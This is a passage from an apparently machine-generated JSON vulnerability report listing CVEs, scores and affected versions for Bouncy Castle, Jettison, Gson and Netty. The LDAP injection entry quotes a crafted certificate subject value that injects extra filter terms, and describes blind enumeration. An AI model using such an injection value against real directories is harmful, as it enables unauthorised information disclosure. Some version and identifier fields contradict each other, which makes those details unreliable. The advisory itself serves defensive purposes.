information for the generation of multiple deterministic ECDSA signatures."}],"product_status":{"known_affected":["org.bouncycastle/bcprov-jdk15on@vers:maven/>=1.46|<=1.65.01"],"known_not_affected":["org.bouncycastle/bcprov-jdk15on@1.66"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15522"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15522"},{"summary":"NetApp Advisory ntap-20210622-0007","url":"https://security.netapp.com/advisory/ntap-20210622-0007"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"LOCAL","availabilityImpact":"NONE","baseScore":5.1,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":5.1,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.1,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["org.bouncycastle/bcprov-jdk15on@vers:maven/>=1.46|<=1.65.01"]}],"title":"CVE-2020-15522/pkg:maven/org.bouncycastle/bcprov-jdk15on@1.55?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-26939"]}],"cve":"CVE-2020-26939","cwe":{"id":"203","name":"Observable Discrepancy"},"discovery_date":"2021-04-22T16:16:49","ids":[{"system_name":"CVE Record","text":"CVE-2020-26939"},{"system_name":"NetApp Advisory","text":"ntap-20201202-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Observable Differences in Behavior to Error Inputs in Bouncy Castle"},{"category":"details","details":"Vulnerability Details","text":"# Observable Differences in 
Behavior to Error Inputs in Bouncy Castle In Legion of the Bouncy Castle BC before 1.55 and BC-FJA before 1.0.2, attackers can obtain sensitive information about a private exponent because of Observable Differences in Behavior to Error Inputs. This occurs in org.bouncycastle.crypto.encodings.OAEPEncoding. Sending invalid ciphertext that decrypts to a short payload in the OAEP Decoder could result in the throwing of an early exception, potentially leaking some information about the private exponent of the RSA private key performing the encryption."}],"product_status":{"known_affected":["org.bouncycastle/bcprov-jdk15on@vers:maven/>=1.46|<=1.60"],"known_not_affected":["org.bouncycastle/bcprov-jdk15on@1.55"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8c36ba34e80e05eecb1f80071cc834d705616f315b634ec0c7d8f42e@%3Cissues.solr.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/11/msg00007.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-26939"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-26939"},{"summary":"NetApp Advisory 
ntap-20201202-0005","url":"https://security.netapp.com/advisory/ntap-20201202-0005"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":5.3,"baseSeverity":"MEDIUM","confidentialityImpact":"LOW","environmentalScore":5.3,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.3,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","version":"3.1"},"products":["org.bouncycastle/bcprov-jdk15on@vers:maven/>=1.46|<=1.60"]}],"title":"CVE-2020-26939/pkg:maven/org.bouncycastle/bcprov-jdk15on@1.55?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-33201"]}],"cve":"CVE-2023-33201","cwe":{"id":"295","name":"Improper Certificate Validation"},"discovery_date":"2023-07-05T03:30:23","ids":[{"system_name":"CVE Record","text":"CVE-2023-33201"},{"system_name":"NetApp Advisory","text":"ntap-20230824-0008"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Bouncy Castle For Java LDAP injection vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Bouncy Castle For Java LDAP injection vulnerability Bouncy Castle provides the `X509LDAPCertStoreSpi.java` class which can be used in conjunction with the CertPath API for validating certificate paths. Pre-1.73 the implementation did not check the X.500 name of any certificate, subject, or issuer being passed in for LDAP wild cards, meaning the presence of a wild car may lead to Information Disclosure. 
A potential attack would be to generate a self-signed certificate with a subject name that contains special characters, e.g: `CN=Subject*)(objectclass=`. This will be included into the filter and provides the attacker ability to specify additional attributes in the search query. This can be exploited as a blind LDAP injection: an attacker can enumerate valid attribute values using the boolean blind injection technique. The exploitation depends on the structure of the target LDAP directory, as well as what kind of errors are exposed to the user. Changes to the `X509LDAPCertStoreSpi.java` class add the additional checking of any X.500 name used to correctly escape wild card characters."}],"product_status":{"known_affected":["org.bouncycastle/bcprov-jdk15on@vers:maven/>=1.49|<=1.70"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/08/msg00000.html"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-33201"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-33201"},{"summary":"NetApp Advisory 
ntap-20230824-0008","url":"https://security.netapp.com/advisory/ntap-20230824-0008"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":5.3,"baseSeverity":"MEDIUM","confidentialityImpact":"LOW","environmentalScore":5.3,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.3,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","version":"3.1"},"products":["org.bouncycastle/bcprov-jdk15on@vers:maven/>=1.49|<=1.70"]}],"title":"CVE-2023-33201/pkg:maven/org.bouncycastle/bcprov-jdk15on@1.55?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-33202"]}],"cve":"CVE-2023-33202","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2023-11-23T18:30:33","ids":[{"system_name":"CVE Record","text":"CVE-2023-33202"},{"system_name":"NetApp Advisory","text":"ntap-20240125-0001"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Bouncy Castle Denial of Service (DoS)"},{"category":"details","details":"Vulnerability Details","text":"# Bouncy Castle Denial of Service (DoS) Bouncy Castle for Java before 1.73 contains a potential Denial of Service (DoS) issue within the Bouncy Castle org.bouncycastle.openssl.PEMParser class. This class parses OpenSSL PEM encoded streams containing X.509 certificates, PKCS8 encoded keys, and PKCS7 objects. 
Parsing a file that has crafted ASN.1 data through the PEMParser causes an OutOfMemoryError, which can enable a denial of service attack."}],"product_status":{"known_affected":["org.bouncycastle/bcprov-jdk15on@vers:maven/>=1.46|<=1.70"],"known_not_affected":["org.bouncycastle/bcprov-jdk15on@1.73"]},"references":[{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-33202"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-33202"},{"summary":"NetApp Advisory ntap-20240125-0001","url":"https://security.netapp.com/advisory/ntap-20240125-0001"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"LOCAL","availabilityImpact":"HIGH","baseScore":5.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.5,"temporalSeverity":"MEDIUM","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.bouncycastle/bcprov-jdk15on@vers:maven/>=1.46|<=1.70"]}],"title":"CVE-2023-33202/pkg:maven/org.bouncycastle/bcprov-jdk15on@1.55?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-40149"]}],"cve":"CVE-2022-40149","cwe":{"id":"121","name":"Stack-based Buffer Overflow"},"discovery_date":"2022-09-17T00:00:41","ids":[{"system_name":"CVE Record","text":"CVE-2022-40149"},{"system_name":"Debian Advisory","text":"dsa-5312"}],"notes":[{"audience":"developers","category":"other","text":"Out-of-bounds Write","title":"Additional CWE: 787"},{"category":"description","details":"Vulnerability 
Description","text":"Jettison parser crash by stackoverflow"},{"category":"details","details":"Vulnerability Details","text":"# Jettison parser crash by stackoverflow Those using Jettison to parse untrusted XML or JSON data may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow. This effect may support a denial of service attack."}],"product_status":{"known_affected":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.0"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/11/msg00011.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-40149"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-40149"},{"summary":"Debian Advisory dsa-5312","url":"https://www.debian.org/security/2023/dsa-5312"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.0"]}],"title":"CVE-2022-40149/pkg:maven/org.codehaus.jettison/jettison@1.3.7?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-45685"]}],"cve":"CVE-2022-45685","cwe":{"id":"787","name":"Out-of-bounds 
Write"},"discovery_date":"2022-12-13T15:30:26","ids":[{"system_name":"CVE Record","text":"CVE-2022-45685"},{"system_name":"Debian Advisory","text":"dsa-5312"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Jettison Out-of-bounds Write vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Jettison Out-of-bounds Write vulnerability A stack overflow in Jettison before v1.5.2 allows attackers to cause a Denial of Service (DoS) via crafted JSON data."}],"product_status":{"known_affected":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.1"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/12/msg00045.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-45685"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-45685"},{"summary":"Debian Advisory dsa-5312","url":"https://www.debian.org/security/2023/dsa-5312"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.1"]}],"title":"CVE-2022-45685/pkg:maven/org.codehaus.jettison/jettison@1.3.7?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-45693"]}],"cve":"CVE-2022-45693","c
we":{"id":"787","name":"Out-of-bounds Write"},"discovery_date":"2022-12-13T15:30:27","ids":[{"system_name":"CVE Record","text":"CVE-2022-45693"},{"system_name":"Debian Advisory","text":"dsa-5312"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Jettison Out-of-bounds Write vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Jettison Out-of-bounds Write vulnerability Jettison before v1.5.2 was discovered to contain a stack overflow via the map parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string."}],"product_status":{"known_affected":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.1"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/12/msg00045.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-45693"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-45693"},{"summary":"Debian Advisory 
dsa-5312","url":"https://www.debian.org/security/2023/dsa-5312"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.1"]}],"title":"CVE-2022-45693/pkg:maven/org.codehaus.jettison/jettison@1.3.7?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-1436"]}],"cve":"CVE-2023-1436","cwe":{"id":"674","name":"Uncontrolled Recursion"},"discovery_date":"2023-03-22T06:30:21","ids":[{"system_name":"CVE Record","text":"CVE-2023-1436"},{"system_name":"JFrog Advisory","text":"jettison-json-array-dos-xray-427911"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Jettison vulnerable to infinite recursion"},{"category":"details","details":"Vulnerability Details","text":"# Jettison vulnerable to infinite recursion An infinite recursion is triggered in Jettison when constructing a JSONArray from a Collection that contains a self-reference in one of its elements. 
This leads to a StackOverflowError exception being thrown."}],"product_status":{"known_affected":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.3"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-1436"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-1436"},{"summary":"JFrog Advisory jettison-json-array-dos-xray-427911","url":"https://research.jfrog.com/vulnerabilities/jettison-json-array-dos-xray-427911"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.3"]}],"title":"CVE-2023-1436/pkg:maven/org.codehaus.jettison/jettison@1.3.7?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-40150"]}],"cve":"CVE-2022-40150","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2022-09-17T00:00:41","ids":[{"system_name":"CVE Record","text":"CVE-2022-40150"},{"system_name":"Debian Advisory","text":"dsa-5312"}],"notes":[{"audience":"developers","category":"other","text":"Uncontrolled Recursion","title":"Additional CWE: 674"},{"category":"description","details":"Vulnerability Description","text":"Jettison memory exhaustion"},{"category":"details","details":"Vulnerability Details","text":"# Jettison 
memory exhaustion Those using Jettison to parse untrusted XML or JSON data may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by Out of memory. This effect may support a denial of service attack."}],"product_status":{"known_affected":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.1"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/12/msg00045.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-40150"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-40150"},{"summary":"Debian Advisory dsa-5312","url":"https://www.debian.org/security/2023/dsa-5312"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.1"]}],"title":"CVE-2022-40150/pkg:maven/org.codehaus.jettison/jettison@1.3.7?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-25647"]}],"cve":"CVE-2022-25647","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2022-05-03T00:00:44","ids":[{"system_name":"CVE Record","text":"CVE-2022-25647"},{"system_name":"Snyk 
Advisory","text":"SNYK-JAVA-COMGOOGLECODEGSON-1730327"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Debian Advisory","text":"dsa-5227"},{"system_name":"NetApp Advisory","text":"ntap-20220901-0009"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deserialization of Untrusted Data in Gson"},{"category":"details","details":"Vulnerability Details","text":"# Deserialization of Untrusted Data in Gson The package `com.google.code.gson:gson` before 2.8.9 is vulnerable to Deserialization of Untrusted Data via the `writeReplace()` method in internal classes, which may lead to denial of service attacks. ## Related CVE(s) CVE-2022-25647, SNYK-JAVA-COMGOOGLECODEGSON-1730327"}],"product_status":{"known_affected":["com.google.code.gson/gson@vers:maven/>=1.1|<=2.8.8"],"known_not_affected":["com.google.code.gson/gson@2.8.9"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/05/msg00015.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/09/msg00009.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-25647"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-25647"},{"summary":"NetApp Advisory ntap-20220901-0009","url":"https://security.netapp.com/advisory/ntap-20220901-0009"},{"summary":"Snyk Advisory SNYK-JAVA-COMGOOGLECODEGSON-1730327","url":"https://snyk.io/vuln/SNYK-JAVA-COMGOOGLECODEGSON-1730327"},{"summary":"Debian Advisory dsa-5227","url":"https://www.debian.org/security/2022/dsa-5227"},{"summary":"Oracle Advisory 
cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.7,"baseSeverity":"HIGH","confidentialityImpact":"LOW","environmentalScore":7.7,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.7,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:H","version":"3.1"},"products":["com.google.code.gson/gson@vers:maven/>=1.1|<=2.8.8"]}],"title":"CVE-2022-25647/pkg:maven/com.google.code.gson/gson@2.8.0?type=jar"},{"acknowledgements":[{"organization":"Mitre"}],"cve":"CVE-2021-21290","cwe":{"id":"378","name":"Creation of Temporary File With Insecure Permissions"},"discovery_date":"2022-05-10T08:46:50","ids":[{"system_name":"CVE Record","text":"CVE-2022-24823"},{"system_name":"GitHub Advisory","text":"GHSA-269q-hmxg-m83q"},{"system_name":"GitHub Advisory","text":"GHSA-5mcr-gq6c-3hq2"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"NetApp Advisory","text":"ntap-20220616-0004"}],"notes":[{"audience":"developers","category":"other","text":"Creation of Temporary File in Directory with Insecure Permissions","title":"Additional CWE: 379"},{"audience":"developers","category":"other","text":"Exposure of Resource to Wrong Sphere","title":"Additional CWE: 668"},{"category":"description","details":"Vulnerability Description","text":"Local Information Disclosure Vulnerability in io.netty:netty-codec-http"},{"category":"details","details":"Vulnerability Details","text":"# Local Information Disclosure Vulnerability in io.netty:netty-codec-http 
### Description ### [GHSA-5mcr-gq6c-3hq2](https://github.com/netty/netty/security/advisories/GHSA-5mcr-gq6c-3hq2) (CVE-2021-21290) contains an insufficient fix for the vulnerability identified. ### Impact ### When netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. This only impacts applications running on Java version 6 and lower. Additionally, this vulnerability impacts code running on Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users. ### Vulnerability Details ### To fix the vulnerability the code was changed to the following: ```java @SuppressJava6Requirement(reason = \"Guarded by version check\") public static File createTempFile(String prefix, String suffix, File directory) throws IOException { if (javaVersion() >= 7) { if (directory == null) { return Files.createTempFile(prefix, suffix).toFile(); } return Files.createTempFile(directory.toPath(), prefix, suffix).toFile(); } if (directory == null) { return File.createTempFile(prefix, suffix); } File file = File.createTempFile(prefix, suffix, directory); // Try to adjust the perms, if this fails there is not much else we can do... file.setReadable(false, false); file.setReadable(true, true); return file; } ``` Unfortunately, this logic path was left vulnerable: ```java if (directory == null) { return File.createTempFile(prefix, suffix); } ``` This file is still readable by all local users. ### Patches ### Update to 4.1.77.Final ### Workarounds ### Specify your own `java.io.tmpdir` when you start the JVM or use `DefaultHttpDataFactory.setBaseDir(...)` to set the directory to something that is only readable by the current user or update to Java 7 or above. 
### References ### - [CWE-378: Creation of Temporary File With Insecure Permissions](https://cwe.mitre.org/data/definitions/378.html) - [CWE-379: Creation of Temporary File in Directory with Insecure Permissions](https://cwe.mitre.org/data/definitions/379.html) ### For more information ### If you have any questions or comments about this advisory: Open an issue in [netty](https://github.com/netty/netty) ## Related CVE(s) CVE-2021-21290, CVE-2022-24823, GHSA-5mcr-gq6c-3hq2"}],"product_status":{"known_affected":["io.netty/netty-codec-http@vers:maven/>=4.0.0.Alpha1|<=4.1.9.Final"]},"references":[{"summary":"GitHub Advisory GHSA-269q-hmxg-m83q","url":"https://github.com/netty/netty/security/advisories/GHSA-269q-hmxg-m83q"},{"summary":"GitHub Advisory GHSA-5mcr-gq6c-3hq2","url":"https://github.com/netty/netty/security/advisories/GHSA-5mcr-gq6c-3hq2"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-24823"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-24823"},{"summary":"NetApp Advisory ntap-20220616-0004","url":"https://security.netapp.com/advisory/ntap-20220616-0004"},{"summary":"Oracle Advisory 
cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"LOCAL","availabilityImpact":"NONE","baseScore":5.5,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":5.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":5.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["io.netty/netty-codec-http@vers:maven/>=4.0.0.Alpha1|<=4.1.9.Final"]}],"title":"CVE-2021-21290/pkg:maven/io.netty/netty-codec-http@4.0.27.Final?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-43797"]}],"cve":"CVE-2021-43797","cwe":{"id":"444","name":"Inconsistent Interpretation of HTTP Requests"},"discovery_date":"2021-12-09T19:09:17","ids":[{"system_name":"CVE Record","text":"CVE-2021-43797"},{"system_name":"GitHub Advisory","text":"GHSA-wx5j-54mm-rqqq"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Debian Advisory","text":"dsa-5316"},{"system_name":"NetApp Advisory","text":"ntap-20220107-0003"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"HTTP request smuggling in netty"},{"category":"details","details":"Vulnerability Details","text":"# HTTP request smuggling in netty ### Impact Netty currently just skips control chars when these are present at the beginning / end of the header name. We should better fail fast as these are not allowed by the spec and could lead to HTTP request smuggling. 
Failing to do the validation might cause netty to \"sanitize\" header names before it forward these to another remote system when used as proxy. This remote system can't see the invalid usage anymore and so not do the validation itself."}],"product_status":{"known_affected":["io.netty/netty-codec-http@vers:maven/>=4.0.0|<4.1.71.Final"],"known_not_affected":["io.netty/netty-codec-http@4.1.71.Final"]},"references":[{"summary":"GitHub Advisory GHSA-wx5j-54mm-rqqq","url":"https://github.com/netty/netty/security/advisories/GHSA-wx5j-54mm-rqqq"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/01/msg00008.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-43797"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-43797"},{"summary":"NetApp Advisory ntap-20220107-0003","url":"https://security.netapp.com/advisory/ntap-20220107-0003"},{"summary":"Debian Advisory dsa-5316","url":"https://www.debian.org/security/2023/dsa-5316"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory 
